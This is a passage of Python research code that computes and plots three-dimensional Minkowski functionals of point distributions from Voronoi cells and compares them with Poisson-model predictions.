print("Total MF generated")
def gen_MF_masked(self,normsize):
print("Summing over all contributing particles")
copiedpMF=np.nan_to_num(self.pMF)#to remove nan indicators
self.MF=np.sum(copiedpMF,axis=1)
self.MFD=self.MF.copy()
for i in range(4):#principal kinematical formula
self.MFD[:,i]=self.MF[:,i]/normsize**3
print("Total MF generated")
def checkcount4(self):
count=0
for _,val in self.edgecounter.items():
if val>3:
count+=1
return count
def plotwall(self,idd,r=None):
fig=plt.figure(figsize=(8,8))
ax=fig.add_subplot(111,aspect="equal")
First=0
for vert in self.wallparams[idd][12][0]:
if First==0:
ax.scatter(*vert.T,s=50,c="green")
First+=1
continue
elif First==1:
ax.scatter(*vert.T,s=25,c="green")
First+=1
continue
ax.scatter(*vert.T,s=1,c="green")
for edge in verttoedges(self.wallparams[idd][12][0]):
ax.plot(*edge.T,lw=1,c="orange")
ax.scatter([0,0],[0,0],s=3,c="red")
if not r==None:
circle1 = plt.Circle([0,0], r, color='red',fill=False)
ax.add_artist(circle1)
def getrMF(idd,r,wallparam,dss):
if r<=wallparam[6]:
return np.array([wallparam[2]*r**3/3,wallparam[2]*r**2/3,0,0,0])
elif r>=wallparam[3]:
return np.array([wallparam[4]*wallparam[6]/3.,0,0,0,0])
else:
cos=wallparam[6]/r
alpha=np.pi-2*np.arccos(cos)
ropsq=r**2-wallparam[6]**2
rop=np.sqrt(ropsq)
if wallparam[12][1]:#inside case
dontevals=[]
for dte in wallparam[8]:
if rop>dte:
dontevals.append(False)
else:
dontevals.append(True)
if all(dontevals):
cc=2*np.pi*rop
return np.array([wallparam[2]*r**3/3-np.pi*((2*r+wallparam[6])*(r-wallparam[6])**2)/3.,
(wallparam[2]-2*np.pi*(1-cos))*r**2/3,
(cc*alpha)/6.,
wallparam[0]*cc/(3*r*rop),
0.])
totsolang=wallparam[2]#we substract from total angle
totareatovol=0
totl=0
G=0
#area contribution from overlap
edges=verttoedges(wallparam[12][0])
packedvertdists=verttoedges(wallparam[10])
packed3dvertdists=verttoedges(wallparam[5])
for dte,theta,edge,packedvertdist,dd3,ds,ss,donteval,solang in zip(wallparam[8],wallparam[9],edges,packedvertdists,packed3dvertdists,dss,wallparam[11],dontevals,wallparam[7]):
thetaabs=np.abs(theta[0])
if donteval:
totareatovol+=thetaabs*ropsq/2.
totsolang-=thetaabs*(1-cos)
totl+=thetaabs*rop
elif rop>=packedvertdist[0] and rop>=packedvertdist[1]:
totareatovol+=np.abs(np.cross(*edge))/2.
totsolang-=np.abs(solang)#zfastsolang(wallparam[6],packedvertdist[0],packedvertdist[1],dd3[0],dd3[1],theta[1],theta[2])
else:
if packedvertdist[0]<=packedvertdist[1]:
if rop>=packedvertdist[0]:
v21=edge[1]-edge[0]
v21n=norm(v21)
theta3=np.arcsin(dte/rop)
theta2=np.arccos(np.dot(v21,edge[1])/(packedvertdist[1]*v21n))
thetaf=theta3-theta2
thetan=thetaabs-thetaf
sin=np.sin(thetan)
totareatovol+=thetaf*ropsq/2.+packedvertdist[0]*rop*np.sin(thetan)/2.
totl+=thetaf*rop
totsolang-=thetaf*(1-cos)+zfastsolang(wallparam[6],rop,packedvertdist[0],r,dd3[0],sin,np.cos(thetan)) #dtp,rop,one,nprop,npone,sin,cos
#print(get_G_ijko(r,*ds)-get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds))
G+=get_G_ijko(r,*ds)#get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)##get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)
elif ss:
totareatovol+=thetaabs*ropsq/2.
totsolang-=thetaabs*(1-cos)
totl+=thetaabs*rop
else:#two crossings
intr=np.sqrt(ropsq-dte**2)
cccc=dte/rop
thetam=2*np.arccos(cccc)
thetafn=thetaabs-thetam
totareatovol+=intr*dte+thetafn*ropsq/2.
totl+=thetafn*rop
totsolang-=thetafn*(1-cos)+zfastsolang(wallparam[6],rop,rop,r,r,np.sin(thetam),2*(cccc)**2-1)#dtp,rop,one,nprop,npone,sin,cos
G+=2*get_G_ijko(r,*ds)#get_G_ijk(r,intr,*ds)#get_G_ijko(r,*ds)#get_G_ijk(r,intr,*ds)
else:
if rop>=packedvertdist[1]:
v21=edge[0]-edge[1]
v21n=norm(v21)
theta3=np.arcsin(dte/rop)
theta2=np.arccos(np.dot(v21,edge[0])/(packedvertdist[0]*v21n))
thetaf=theta3-theta2
thetan=thetaabs-thetaf
sin=np.sin(thetan)
totareatovol+=thetaf*ropsq/2.+packedvertdist[1]*rop*sin/2.
totl+=thetaf*rop
totsolang-=thetaf*(1-cos)+zfastsolang(wallparam[6],rop,packedvertdist[1],r,dd3[1],sin,np.cos(thetan))
G+=get_G_ijko(r,*ds)#get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)#get_G_ijko(r,*ds)#get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)
elif ss:
totareatovol+=thetaabs*ropsq/2.
totsolang-=thetaabs*(1-cos)
totl+=thetaabs*rop
else:#two crossings
intr=np.sqrt(ropsq-dte**2)
cccc=dte/rop
thetam=2*np.arccos(cccc)
thetafn=thetaabs-thetam
totareatovol+=intr*dte+thetafn*ropsq/2.
totl+=thetafn*rop
totsolang-=thetafn*(1-cos)+zfastsolang(wallparam[6],rop,rop,r,r,np.sin(thetam),2*(cccc)**2-1)
G+=2*get_G_ijko(r,*ds)#get_G_ijk(r,intr,*ds)#get_G_ijko(r,*ds)#get_G_ijk(r,intr,*ds)
else:#outside case
dontevals=[]
meeting=False
edges=verttoedges(wallparam[12][0])
packedvertdists=verttoedges(wallparam[10])
polcontrisolang=0#we substract
totareatovol=0
totl=0
G=0
for packedvertdist,dte,ss in zip(packedvertdists,wallparam[8],wallparam[11]):#Need fix
if rop>dte:
dontevals.append(False)
if not meeting:
if not ss:
meeting=True
else:
if packedvertdist[0]<rop or packedvertdist[0]<rop:
meeting=True
else:
dontevals.append(True)
if not meeting:
return np.array([wallparam[2]*r**3/3,wallparam[2]*r**2/3,0,0,0])
packed3dvertdists=verttoedges(wallparam[5])
for dte,theta,edge,packedvertdist,dd3,ds,ss,donteval,solang in zip(wallparam[8],wallparam[9],edges,packedvertdists,packed3dvertdists,dss,wallparam[11],dontevals,wallparam[7]):
anticlock=np.sign(theta[0])
thetaabs=np.abs(theta[0])
#if i[0]==wallparam[12][3] or i[0]==wallparam[12][2]:
#anticlock=-anticlock
if donteval:
totareatovol+=theta[0]*ropsq/2.
polcontrisolang+=theta[0]*(1-cos)
totl+=theta[0]*rop
elif rop>=packedvertdist[0] and rop>=packedvertdist[1]:
totareatovol+=anticlock*np.abs(np.cross(*edge))/2.
polcontrisolang+=solang#because we already included the sign
else:
#print("here")
if packedvertdist[0]<=packedvertdist[1]:
if rop>=packedvertdist[0]:
v21=edge[1]-edge[0]
v21n=norm(v21)
theta3=np.arcsin(dte/rop)
theta2=np.arccos(np.dot(v21,edge[1])/(packedvertdist[1]*v21n))
thetaf=theta3-theta2
thetan=thetaabs-thetaf
sin=np.sin(thetan)
totareatovol+=anticlock*(thetaf*ropsq/2.+packedvertdist[0]*rop*np.sin(thetan)/2.)
totl+=anticlock*thetaf*rop
polcontrisolang+=anticlock*(thetaf*(1-cos)+zfastsolang(wallparam[6],rop,packedvertdist[0],r,dd3[0],sin,np.cos(thetan)))
G+=get_G_ijko(r,*ds)#get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)#get_G_ijko(r,*ds)#get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)
elif ss:
totareatovol+=theta[0]*ropsq/2.
polcontrisolang+=theta[0]*(1-cos)
totl+=theta[0]*rop
else:#two crossings
intr=np.sqrt(ropsq-dte**2)
cccc=dte/rop
thetam=2*np.arccos(cccc)
thetafn=thetaabs-thetam
totareatovol+=anticlock*(intr*dte+thetafn*ropsq/2.)
totl+=anticlock*thetafn*rop
polcontrisolang+=anticlock*(thetafn*(1-cos)+zfastsolang(wallparam[6],rop,rop,r,r,np.sin(thetam),2*(cccc)**2-1))
G+=2*get_G_ijko(r,*ds)#get_G_ijk(r,intr,*ds)#get_G_ijko(r,*ds)#get_G_ijk(r,intr,*ds)
else:
if rop>=packedvertdist[1]:
v21=edge[0]-edge[1]
v21n=norm(v21)
theta3=np.arcsin(dte/rop)
theta2=np.arccos(np.dot(v21,edge[0])/(packedvertdist[0]*v21n))
thetaf=theta3-theta2
thetan=thetaabs-thetaf
sin=np.sin(thetan)
totareatovol+=anticlock*(thetaf*ropsq/2.+packedvertdist[1]*rop*np.sin(thetan)/2.)
totl+=anticlock*thetaf*rop
polcontrisolang+=anticlock*(thetaf*(1-cos)+zfastsolang(wallparam[6],rop,packedvertdist[1],r,dd3[1],sin,np.cos(thetan)))
G+=get_G_ijko(r,*ds)#get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)#get_G_ijko(r,*ds)#get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)
elif ss:
totareatovol+=theta[0]*ropsq/2.
polcontrisolang+=theta[0]*(1-cos)
totl+=theta[0]*rop
else:#two crossings
intr=np.sqrt(ropsq-dte**2)
cccc=dte/rop
thetam=2*np.arccos(cccc)
thetafn=thetaabs-thetam
totareatovol+=anticlock*(intr*dte+thetafn*ropsq/2.)
totl+=anticlock*thetafn*rop
polcontrisolang+=anticlock*(thetafn*(1-cos)+zfastsolang(wallparam[6],rop,rop,r,r,np.sin(thetam),2*(cccc)**2-1))
G+=2*get_G_ijko(r,*ds)#get_G_ijk(r,intr,*ds)#get_G_ijko(r,*ds)#
#print(totareatovol,polcontrisolang,totl)
if polcontrisolang>=0:
totsolang=wallparam[2]-polcontrisolang
else:
totsolang=wallparam[2]+polcontrisolang
totareatovol=np.abs(totareatovol)
totl=np.abs(totl)
rM0=totareatovol*wallparam[6]/3.+totsolang*r**3/3
rM1=totsolang*r**2/3
rM21=(alpha*totl)/6.
rM22=wallparam[0]*totl/(3*r*rop)
rM3=G/3
return np.array([rM0,rM1,rM21,rM22,rM3])
def MinkFunc3d(rs,points,vor,size,boundary="optimal"):
global rtimewprMFs,rtimesum
rtimewprMFs=[]
rtimesum=[]
ttttime=time.time()
totnum=len(points)
if boundary=="optimal":
print("Taking optimal boundary")
boundinds=[]
contributingwalls={}
for i,pt in enumerate(points):
if any([w==-1 for w in vor.regions[vor.point_region[i]]]):
boundinds.append(i)
continue
if any([(v[0]<0 or v[0]>size or v[1]<0 or v[1]>size or v[2]<0 or v[2]>size) for v in vor.vertices[vor.regions[vor.point_region[i]]]]):
boundinds.append(i)
continue
print(str(len(boundinds))+" particles contributing by cell limitations.")
VC=VCells()
wallidit=0
boundedges={}
boundwalls={}
for ptinds,wall in vor.ridge_dict.items():
d=dist(points[ptinds[0]],points[ptinds[1]])
VC.add_wall(wallidit,ptinds,wall,d,[points[ptinds[0]],points[ptinds[1]]])
if boundary=="optimal":
if (ptinds[0] in boundinds):
if ptinds[1] not in boundinds:
boundwalls[wallidit]=True
for i,edgeinds in enumerate(vertstoedgesorted(wall)):
boundedges.setdefault(edgeinds,[]).extend((np.array(points[ptinds[1]]-points[ptinds[0]]),d,dist(*vor.vertices[[*edgeinds]])))
if (ptinds[1] in boundinds):
if ptinds[0] not in boundinds:
boundwalls[wallidit]=True
for i,edgeinds in enumerate(vertstoedgesorted(wall)):
boundedges.setdefault(edgeinds,[]).extend((np.array(points[ptinds[0]]-points[ptinds[1]]),d,dist(*vor.vertices[[*edgeinds]])))
wallidit+=1
VC.gen_wall_lists(totnum)
wls=VC.walllists
verts=vor.vertices
if boundary=="mask":
print("Taking masked boundary")
boundinds=[]
contributingwalls={}
rmax2=2*np.max(rs)
tr=size-rmax2
for i,point in enumerate(points):
if len(wls[i])==0:
boundinds.append(i)
continue
if point[0]<=rmax2 or point[0]>=tr or point[1]<=rmax2 or point[1]>=tr or point[2]<=rmax2 or point[2]>=tr:
boundinds.append(i)
continue
for idd in wls[i]:
contributingwalls[idd]=True
normsize=size-2*rmax2
print(str(len(boundinds))+" particles contributing by cell limitations.")
if boundary=="optimal":
contributingwalls={}
for i,pt in enumerate(points):
if i in boundinds:
continue
for idd in wls[i]:
contributingwalls[idd]=True
VC.gen_wall_params(vor,contributingwalls)#contributing for at least one
VC.gen_ptrcellvol(totnum,contributingwalls)#contributing for at least one
#print(len(contributingwalls),len(VC.walls))
if boundary=="optimal":
print("Generating Window MF.")
M0tot=0
M1tot=0
M2tot=0
M3tot=4*np.pi/3
st=time.time()
for i,pt in enumerate(points):
if i in boundinds:
continue
M0tot+=VC.ptrcellvol[i]
for idd,_ in boundwalls.items():
M1tot+=VC.wallparams[idd][4]
for _,val in boundedges.items():
if len(val)!=6:
print("?")
M2tot+=np.arccos(val[0].dot(val[3])/(val[1]*val[4]))*val[2]
del boundedges
M1tot=M1tot/3
M2tot=M2tot/3
print("Window MF generated. Time: "+str(time.time()-st))
rboundsforparticle=[[],[]]
st=time.time()
for i,point in enumerate(points):
if i in boundinds:#boundforalls
rboundsforparticle[0].append(size)
rboundsforparticle[1].append(0)
continue
rmin=size
rmax=0
#print(i)
for idd in wls[i]:
thismin=VC.wallparams[idd][0]/2
#print(idd)
thismax=VC.wallparams[idd][3]
if rmin>=thismin:
rmin=thismin
if rmax<=thismax:
rmax=thismax
rboundsforparticle[0].append(rmin)#only make for valid particles
rboundsforparticle[1].append(rmax)
accelerator=[{},{}]
for ptinds,idd in VC.pointstowall.items():
#print(ptinds,idd)
accelerator[0][idd]=min(rboundsforparticle[0][ptinds[0]],rboundsforparticle[0][ptinds[1]])
accelerator[1][idd]=max(rboundsforparticle[1][ptinds[0]],rboundsforparticle[1][ptinds[1]])
VC.gen_wprMFs(rs,contributingwalls,accelerate=True,accelerator=accelerator)
VC.gen_pMF(rs,totnum,boundinds,accelerate=True,ptrbound=rboundsforparticle)
if boundary=="optimal":
VC.gen_MF(M0tot,M1tot,M2tot,M3tot)
tottime=time.time()-ttttime
print("Grand Sum Time: "+str(tottime)+" in rough, "+str(tottime/((totnum-len(boundinds))*len(rs)))+" per particle per radius.")
return VC,boundinds,M0tot,M1tot,M2tot,M3tot,rboundsforparticle
if boundary=="mask":
VC.gen_MF_masked(normsize)
return VC,boundinds,normsize
def getMFTs(rs,rho):#theoretical from poisson
#numcontpart=n-len(bdi)
rfts=rs
V_circ=4*np.pi*rfts**3/3
A_circ=2*np.pi*rfts**2/3
L_circ=4*rfts/3
X_circ=1
MFTs=[]
MFTs.append((1-np.exp(-rho*V_circ)))
MFTs.append(2*rho*A_circ*np.exp(-rho*V_circ))
MFTs.append(np.pi*rho*(L_circ-3*np.pi*rho*A_circ**2/8)*np.exp(-rho*V_circ))
MFTs.append(4*np.pi*rho*(X_circ-9*rho*A_circ*L_circ/2+9*np.pi*rho**2*A_circ**3/16)*np.exp(-rho*V_circ)/3)
return np.array(MFTs)
def interpolatePoissonmSig(rs,rho):
global sigarr0,sigarr1,sigarr2,sigarr3
rt=rs/(1/rho)**(1/3)*100 #precalculated at md=100
return np.array([sigarr0(rt),sigarr1(rt)*(rho/1.0332793625494781e-06)**(1/3),sigarr2(rt)*(rho/1.0332793625494781e-06)**(2/3),sigarr3(rt)*(rho/1.0332793625494781e-06)])#scalings
def plotwithPoissErr(rs,VC,totnum,boundinds,MD0,label="",size=1000):
rho=(totnum-len(boundinds))/MD0
MFTs=getMFTs(rs,rho)
sigs=interpolatePoissonmSig(rs,rho)
w=0
fig=plt.figure(figsize=(22,15),dpi=200)
axs=[]
for w in range(4):
axs.append(fig.add_subplot(int("22"+str(w+1))))
axs[w].scatter(rs,VC.MFD[:,w],s=5,c="black",label=label)
axs[w].fill_between(rs,MFTs[w,:]-3*sigs[w,:],MFTs[w,:]+3*sigs[w,:],color="red",alpha=0.2,label="3 $\\sigma$ region")
axs[w].plot(rs,MFTs[w][:],c="blue",lw=1,label="Poisson")
axs[w].set_xlabel("Evalutation radius r",fontsize=16)
axs[w].set_ylabel("$w_"+str(w)+"$",fontsize=18)
axs[w].set_title("N="+str(totnum)+" L="+str(size),fontsize=18)
axs[w].legend(fontsize=14)
axs[2].set_ylim(np.min(MFTs[2][:])*1.1,np.max(MFTs[2][:])*1.1)
axs[3].set_ylim(np.min(MFTs[3][:])*1.1,np.max(MFTs[3][:])*1.1)
return fig,axs
def MF3Dplot(rs,VC,totnum,boundinds,normsize):
neff=totnum-len(boundinds)
MFTs=getMFTs(rs,neff/normsize**3,neff)
fig, axs = plt.subplots(4,2)
fig.set_size_inches(15,5*(4))
for i in range(4):
axs[i,0].scatter(rs,VC.MFD[:,i],s=1,label="M-"+str(i))
axs[i,0].plot(rs,MFTs[i],lw=1,c="blue",label="M-"+str(i))
axs[i,0].set_xlabel("R")
axs[i,0].set_ylabel("Functional Values over "+str(normsize)+"^3")
axs[i,0].legend()
mar=0.15*(np.max(MFTs[i])-np.min(MFTs[i]))
axs[i,0].set_ylim(np.min(MFTs[i])-mar,np.max(MFTs[i])+mar)
axs[i,1].scatter(rs,VC.MFD[:,i],s=1,label="M-"+str(i))
axs[i,1].set_xlabel("R")
axs[i,1].set_ylabel("Normalized Functional Values")
axs[i,1].legend()
def MF3Dplotopt(rs,VC,totnum,boundinds,MD0):
neff=totnum-len(boundinds)
MFTs=getMFTs(rs,neff/MD0)#neff/MD0,neff)
fig, axs = plt.subplots(4,2)
fig.set_dpi(200)
fig.set_size_inches(18,5*(4))
for i in range(4):
axs[i,0].scatter(rs,VC.MFD[:,i],s=1,label="m"+str(i))
axs[i,0].plot(rs,MFTs[i],lw=1,c="blue",label="m"+str(i))
axs[i,0].set_xlabel("r")
axs[i,0].set_ylabel("Functional Densities")
axs[i,0].legend()
mar=0.15*(np.max(MFTs[i])-np.min(MFTs[i]))
axs[i,0].set_ylim(np.min(MFTs[i])-mar,np.max(MFTs[i])+mar)
axs[i,1].scatter(rs,VC.MFD[:,i]/(C_chi*rs**(3-i)),s=1,label="M-"+str(i))
axs[i,1].plot(rs,MFTs[i]/(C_chi*rs**(3-i)),lw=1,c="blue",label="m"+str(i))
mar=0.15*(np.max(MFTs[i]/(C_chi*rs**(3-i)))-np.min(MFTs[i]/(C_chi*rs**(3-i))))
axs[i,1].set_ylim(np.min(MFTs[i]/(C_chi*rs**(3-i)))-mar,np.max(MFTs[i]/(C_chi*rs**(3-i)))+mar)
axs[i,1].set_xlabel("r")
axs[i,1].set_ylabel("Reduced Functional Density Values")
axs[i,1].legend()
def plotMF(rs,MFD,totnum,boundinds,MD0):
neff=totnum-len(boundinds)
MFTs=getMFTs(rs,neff/MD0)#neff/MD0,neff)
fig, axs = plt.subplots(4,2)
fig.set_size_inches(15,5*(4))
for i in range(4):
axs[i,0].scatter(rs,MFD[:,i],s=1,label="M-"+str(i))
axs[i,0].plot(rs,MFTs[i],lw=1,c="blue",label="M-"+str(i))
axs[i,0].set_xlabel("R")
axs[i,0].set_ylabel("Functional Values over "+str(MD0))
axs[i,0].legend()
mar=0.15*(np.max(MFTs[i])-np.min(MFTs[i]))
axs[i,0].set_ylim(np.min(MFTs[i])-mar,np.max(MFTs[i])+mar)
axs[i,1].scatter(rs,MFD[:,i],s=1,label="M-"+str(i))
axs[i,1].set_xlabel("R")
axs[i,1].set_ylabel("Normalized Functional Values")
axs[i,1].legend()
def quietMF3D(rs,points,size):
global rtimewprMFs,rtimesum
rtimewprMFs=[]
rtimesum=[]
tlog=[]
ttttime=time.time()
st=time.time()
vor=Voronoi(points)
tlog.append(time.time()-st)
st=time.time()
totnum=len(points)
boundinds=[]
contributingwalls={}
for i,pt in enumerate(points):
if any([w==-1 for w in vor.regions[vor.point_region[i]]]):
boundinds.append(i)
continue
if any([(v[0]<0 or v[0]>size or v[1]<0 or v[1]>size or v[2]<0 or v[2]>size) for v in vor.vertices[vor.regions[vor.point_region[i]]]]):
boundinds.append(i)
continue
VC=VCellsq()
wallidit=0
boundedges={}
boundwalls={}
for ptinds,wall in vor.ridge_dict.items():
d=dist(points[ptinds[0]],points[ptinds[1]])
VC.add_wall(wallidit,ptinds,wall,d,[points[ptinds[0]],points[ptinds[1]]])
if (ptinds[0] in boundinds):
if ptinds[1] not in boundinds:
boundwalls[wallidit]=True
for i,edgeinds in enumerate(vertstoedgesorted(wall)):
boundedges.setdefault(edgeinds,[]).extend((np.array(points[ptinds[1]]-points[ptinds[0]]),d,dist(*vor.vertices[[*edgeinds]])))
if (ptinds[1] in boundinds):
if ptinds[0] not in boundinds:
boundwalls[wallidit]=True
for i,edgeinds in enumerate(vertstoedgesorted(wall)):
boundedges.setdefault(edgeinds,[]).extend((np.array(points[ptinds[0]]-points[ptinds[1]]),d,dist(*vor.vertices[[*edgeinds]])))
wallidit+=1
VC.gen_wall_lists(totnum)
tlog.append(time.time()-st)
st=time.time()
wls=VC.walllists
verts=vor.vertices
contributingwalls={}
for i,pt in enumerate(points):
if i in boundinds:
continue
for idd in wls[i]:
contributingwalls[idd]=True
VC.gen_wall_params(vor,contributingwalls)#contributing for at least one
tlog.append(time.time()-st)
st=time.time()
VC.gen_ptrcellvol(totnum,contributingwalls)#contributing for at least one
MD0=0
st=time.time()
for i,pt in enumerate(points):
if i in boundinds:
continue
MD0+=VC.ptrcellvol[i]
tlog.append(time.time()-st)
st=time.time()
rboundsforparticle=[[],[]]
st=time.time()
for i,point in enumerate(points):
if i in boundinds:#boundforalls
rboundsforparticle[0].append(size)
rboundsforparticle[1].append(0)
continue
rmin=size
rmax=0
#print(i)
for idd in wls[i]:
thismin=VC.wallparams[idd][0]/2
#print(idd)
thismax=VC.wallparams[idd][3]
if rmin>=thismin:
rmin=thismin
if rmax<=thismax:
rmax=thismax
rboundsforparticle[0].append(rmin)#only make for valid particles
rboundsforparticle[1].append(rmax)
accelerator=[{},{}]
for ptinds,idd in VC.pointstowall.items():
#print(ptinds,idd)
accelerator[0][idd]=min(rboundsforparticle[0][ptinds[0]],rboundsforparticle[0][ptinds[1]])
accelerator[1][idd]=max(rboundsforparticle[1][ptinds[0]],rboundsforparticle[1][ptinds[1]])
tlog.append(time.time()-st)
st=time.time()
VC.gen_wprMFs(rs,contributingwalls,accelerate=True,accelerator=accelerator)
tlog.append(time.time()-st)
st=time.time()
VC.gen_pMF(rs,totnum,boundinds,accelerate=True,ptrbound=rboundsforparticle)
tlog.append(time.time()-st)
st=time.time()
VC.gen_MF(MD0)
tlog.append(time.time()-st)
st=time.time()
tottime=time.time()-ttttime
tlog.append(tottime)
print("Grand Sum Time: "+str(tottime)+" in rough, "+str(tottime/((totnum-len(boundinds))*len(rs)))+" per particle per radius.")
return VC,boundinds,MD0,[rtimewprMFs,rtimesum],tlog
def MinkowskiFunctional(rs,points,size):
global rtimewprMFs,rtimesum
rtimewprMFs=[]
rtimesum=[]
tlog=[]
ttttime=time.time()
st=time.time()
vor=Voronoi(points)
tlog.append(time.time()-st)
st=time.time()
totnum=len(points)
boundinds=[]
contributingwalls={}
print("Evaluating boundaries")
for i,pt in enumerate(points):
if any([w==-1 for w in vor.regions[vor.point_region[i]]]):
boundinds.append(i)
continue
if any([(v[0]<0 or v[0]>size or v[1]<0 or v[1]>size or v[2]<0 or v[2]>size) for v in vor.vertices[vor.regions[vor.point_region[i]]]]):
boundinds.append(i)
continue
VC=VCellsq()
wallidit=0
boundedges={}
boundwalls={}
for ptinds,wall in vor.ridge_dict.items():
d=dist(points[ptinds[0]],points[ptinds[1]])
VC.add_wall(wallidit,ptinds,wall,d,[points[ptinds[0]],points[ptinds[1]]])
if (ptinds[0] in boundinds):
if ptinds[1] not in boundinds:
boundwalls[wallidit]=True
for i,edgeinds in enumerate(vertstoedgesorted(wall)):
boundedges.setdefault(edgeinds,[]).extend((np.array(points[ptinds[1]]-points[ptinds[0]]),d,dist(*vor.vertices[[*edgeinds]])))
if (ptinds[1] in boundinds):
if ptinds[0] not in boundinds:
boundwalls[wallidit]=True
for i,edgeinds in enumerate(vertstoedgesorted(wall)):
boundedges.setdefault(edgeinds,[]).extend((np.array(points[ptinds[0]]-points[ptinds[1]]),d,dist(*vor.vertices[[*edgeinds]])))
wallidit+=1
VC.gen_wall_lists(totnum)
tlog.append(time.time()-st)
st=time.time()
wls=VC.walllists
verts=vor.vertices
contributingwalls={}
for i,pt in enumerate(points):
if i in boundinds:
continue
for idd in wls[i]:
contributingwalls[idd]=True
print("Generating Wall Parameters")
VC.gen_wall_params(vor,contributingwalls)#contributing for at least one
tlog.append(time.time()-st)
st=time.time()
VC.gen_ptrcellvol(totnum,contributingwalls)#contributing for at least one
MD0=0
st=time.time()
for i,pt in enumerate(points):
if i in boundinds:
continue
MD0+=VC.ptrcellvol[i]
tlog.append(time.time()-st)
st=time.time()
rboundsforparticle=[[],[]]
st=time.time()
print("Preparing Accelerator")
for i,point in enumerate(points):
if i in boundinds:#boundforalls
rboundsforparticle[0].append(size)
rboundsforparticle[1].append(0)
continue
rmin=size
rmax=0
#print(i)
for idd in wls[i]:
thismin=VC.wallparams[idd][0]/2
#print(idd)
thismax=VC.wallparams[idd][3]
if rmin>=thismin:
rmin=thismin
if rmax<=thismax:
rmax=thismax
rboundsforparticle[0].append(rmin)#only make for valid particles
rboundsforparticle[1].append(rmax)
accelerator=[{},{}]
for ptinds,idd in VC.pointstowall.items():
#print(ptinds,idd)
accelerator[0][idd]=min(rboundsforparticle[0][ptinds[0]],rboundsforparticle[0][ptinds[1]])
accelerator[1][idd]=max(rboundsforparticle[1][ptinds[0]],rboundsforparticle[1][ptinds[1]])
tlog.append(time.time()-st)
st=time.time()
print("Wall Functional Calculation")
VC.gen_wprMFs(rs,contributingwalls,accelerate=True,accelerator=accelerator)
tlog.append(time.time()-st)
st=time.time()
print("Summing over walls")
VC.gen_pMF(rs,totnum,boundinds,accelerate=True,ptrbound=rboundsforparticle)
tlog.append(time.time()-st)
st=time.time()
VC.gen_MF(MD0)
tlog.append(time.time()-st)
st=time.time()
tottime=time.time()-ttttime
tlog.append(tottime)
print("Grand Sum Time: "+str(tottime)+" in rough, "+str(tottime/((totnum-len(boundinds))*len(rs)))+" per particle per radius.")
return VC,boundinds,MD0,[rtimewprMFs,rtimesum],tlog
class VCellsq:
def __init__(self):
self.pointstowall={}
self.adjm={}
self.edgecounter={}
self.walls={}
self.wallparams={}
def add_wall(self,idd,ptinds,wall,d,tpoints):
offflag=False
if any([x==-1 for x in wall]):
offflag=True
if ptinds[0]<=ptinds[1]:
ind=(ptinds[0],ptinds[1])
else:
ind=(ptinds[1],ptinds[0])
if not offflag:
self.pointstowall[ind]=idd
self.walls[idd]=wall
self.wallparams[idd]=[d,tpoints]
for edgeinds in vertstoedgesorted(wall):
if not edgeinds in self.edgecounter:
self.edgecounter[edgeinds]=1
else:
self.edgecounter[edgeinds]+=1
self.adjm.setdefault(edgeinds,[]).append(d)
def gen_wall_lists(self,size):
try:
self.walllists
return
except:
self.walllists=[[] for _ in range(size)]
st=time.time()
for pinds,wallidd in self.pointstowall.items():
self.walllists[pinds[0]].append(wallidd)
self.walllists[pinds[1]].append(wallidd)
def gen_wall_params(self,vor,contributingwalls=None):
st=time.time()
waltotnum=len(self.walls)
for idd,wall in self.walls.items():
if not contributingwalls==None:
if idd not in contributingwalls:
continue
x=self.wallparams[idd][1][0]
y=self.wallparams[idd][1][1]
verts=vor.vertices[wall]
maxrforwall=0
vertdists=[]
for vert in verts:
dt=dist(x,vert)
vertdists.append(dt)
if dt>maxrforwall:
maxrforwall=dt
n=x-y
d=-n.dot(x+y)/2
dtp,h=disttoplane(x,n,d)
verts2d,inside,thets=convcoor(normvec(n),h,verts)
wallarea=polarea2d(verts2d)
vert2dnorms=[]
for vert2d in verts2d:
vert2dnorms.append(norm(vert2d))
solangs=[]
dtes=[]
thetas=[]
sss=[]
for i,(edge2d,thet2) in enumerate(zip(verttoedges(verts2d),verttoedges(thets))):
nop,c=getline_abc(edge2d)
nopnormsq=np.einsum('i,i', nop, nop)
nopnorm=np.sqrt(nopnormsq)
dte=np.abs(c)/nopnorm
dtes.append(dte)
theta=thet2[1]-thet2[0]
if inside:#detect crossing at pi
if theta<-np.pi:
theta+=2*np.pi
elif theta>np.pi:
theta-=2*np.pi
s=np.abs(np.sin(theta))
ccos=np.cos(theta)
thetas.append((theta,s,ccos))
xdet=-nop[0]*c/nopnormsq
if (xdet>edge2d[0][0] and xdet<edge2d[1][0]) or (xdet<edge2d[0][0] and xdet>edge2d[1][0]):
sss.append(False)
else:
sss.append(True)
if theta>=0:
solangs.append(zfastsolang(dtp,vert2dnorms[i-1],vert2dnorms[i],vertdists[i-1],vertdists[i],s,ccos))
else:
solangs.append(-zfastsolang(dtp,vert2dnorms[i-1],vert2dnorms[i],vertdists[i-1],vertdists[i],s,ccos))
fullsolang=np.abs(np.sum(solangs))
self.wallparams[idd].extend((fullsolang,maxrforwall,wallarea,vertdists,dtp,solangs,dtes,thetas,vert2dnorms,sss, (verts2d,inside)))
def gen_ptrcellvol(self,size,contributingwalls):
self.ptrcellvol=[0 for _ in range(size)]
st=time.time()
for pinds,idd in self.pointstowall.items():
if idd not in contributingwalls:
continue
thisvol=self.wallparams[idd][4]*self.wallparams[idd][6]/3.
self.ptrcellvol[pinds[0]]+=thisvol
self.ptrcellvol[pinds[1]]+=thisvol
def gen_wprMFs(self,rs,contributingwalls=None,accelerate=False,accelerator=None):#one-side computation
global rtimewprMFs
self.wprMFs=[{} for _ in range(len(rs))]
n=len(self.walls)
if accelerate:
if accelerator==None:
assert False,"No Accelerator given"
st=time.time()
for i,r in enumerate(rs):
freestoadd=0
stt=time.time()
for idd,wall in self.walls.items():
if not contributingwalls==None:
if idd not in contributingwalls:
continue
if accelerate and (accelerator[0][idd]>r or accelerator[1][idd]<r):
continue
else:
dstosend=[]
for edgeinds in vertstoedgesorted(wall):
if len(self.adjm[edgeinds])!=3:
